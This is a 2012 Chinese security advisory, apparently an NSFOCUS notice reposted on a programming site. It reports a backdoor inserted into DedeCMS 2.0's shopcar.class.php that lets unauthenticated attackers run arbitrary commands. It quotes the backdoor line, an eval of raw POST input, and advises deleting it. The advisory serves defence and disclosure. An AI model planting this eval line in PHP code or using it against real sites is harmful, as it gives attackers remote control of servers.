发布日期:2012-03-21
更新日期:2012-03-22受影响系统:
dedecms dedecms 2.0
描述:
--------------------------------------------------------------------------------
DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。<*来源:jsbug
链接:http://www.wooyun.org/bugs/wooyun-2010-05416
*>建议:
--------------------------------------------------------------------------------
临时解决方法:如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码
@eval(file_get_contents("php://input"));即可。厂商补丁:dedecms
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dedecms.com/products/dedecms/Dell Webcam "crazytalk4.ocx" ActiveX多个缓冲器溢出漏洞Citrix XenServer vSwitch Controller组件多个不明细节漏洞相关资讯 织梦CMS漏洞 本文评论 查看全部评论 (1)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
| |
易网时代-编程资源站